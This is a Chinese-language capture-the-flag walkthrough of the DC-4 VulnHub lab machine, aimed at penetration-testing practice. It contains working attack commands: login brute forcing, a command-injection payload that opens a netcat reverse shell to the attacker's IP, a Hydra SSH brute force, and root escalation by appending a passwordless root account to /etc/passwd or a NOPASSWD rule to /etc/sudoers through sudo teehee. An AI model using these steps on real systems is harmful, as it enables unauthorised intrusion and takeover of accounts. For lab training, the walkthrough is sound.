DC-4 靶机渗透测试详细教程

靶机信息

• 下载地址: https://download.vulnhub.com/dc/DC-4.zip
• 难度: 中等
• 目标: 获取root权限

环境准备

1. 将DC-4靶机导入虚拟机软件(VMware/VirtualBox)
2. 确保攻击机(Kali Linux)与靶机在同一网络

渗透测试流程

1. 主机发现

使用以下命令发现靶机IP:

arp-scan -l
# 或
nmap -sn 192.168.1.0/24

2. 端口扫描

nmap -p- <靶机IP>

发现开放端口:

• 22 (SSH)
• 80 (HTTP)

详细服务扫描:

nmap -p80,22 -sV -A <靶机IP>

3. Web服务识别

whatweb http://<靶机IP>

未发现特别有价值的信息

4. Web渗透

登录页面分析

访问Web界面发现管理员登录页面

暴力破解

1. 输入用户名admin和任意密码
2. 使用Burp Suite拦截登录请求
3. 发送到Intruder模块进行暴力破解
4. 通过响应大小判断成功密码为happy

命令执行漏洞

1. 使用admin:happy登录后台
2. 发现"Command"功能可以执行命令
3. 尝试执行whoami确认命令执行漏洞
4. 抓包修改命令为反弹shell:

radio=nc+-e+/bin/bash+<攻击机IP>+8888&submit=跑

5. 在Kali上监听:

nc -lvnp 8888

稳定shell

获取基本shell后升级为稳定shell:

python -c "import pty;pty.spawn('/bin/bash')"

5. SSH暴力破解

用户发现

在/home目录发现三个用户:

• charles
• jim
• sam

其中/home/jim目录下有文件:

• backups
• old-passwords.bak
• test.sh

密码提取

从old-passwords.bak获取密码列表

Hydra爆破

1. 创建用户列表user.txt:

charles
jim
sam

2. 使用old-passwords.bak作为密码字典
3. 执行爆破:

hydra -L user.txt -P old-passwords.bak ssh://<靶机IP>

成功爆破出jim的密码

6. SSH登录

使用爆破出的密码登录jim账户:

ssh jim@<靶机IP>

7. 横向提权

邮件信息

检查jim的邮件:

cat /var/mail/jim

发现charles发来的邮件包含SSH密码

登录charles账户

使用邮件中的密码登录charles账户:

ssh charles@<靶机IP>

8. 权限提升

sudo权限检查

sudo -l

发现charles可以以root权限执行/usr/bin/teehee

teehee利用

1. 查看帮助:

teehee --help

发现-a参数可以追加内容

2. 方法一: 添加root权限用户

echo "admin::0:0:admin:/root:/bin/bash" | sudo teehee -a /etc/passwd

然后切换用户:

su - admin

3. 方法二: 修改sudoers文件

echo "charles ALL=(ALL:ALL)NOPASSWD:ALL" | sudo teehee -a /etc/sudoers

获取root权限

成功提权后即可获取root shell

总结

渗透路径:

1. Web登录暴力破解 → 后台命令执行 → 反弹shell
2. 发现用户密码 → SSH爆破 → 获取jim权限
3. 邮件信息 → 获取charles权限
4. sudo提权 → 获取root权限

关键点:

• Web应用暴力破解
• 命令注入漏洞利用
• 密码重用导致的横向移动
• 不安全的sudo配置导致的权限提升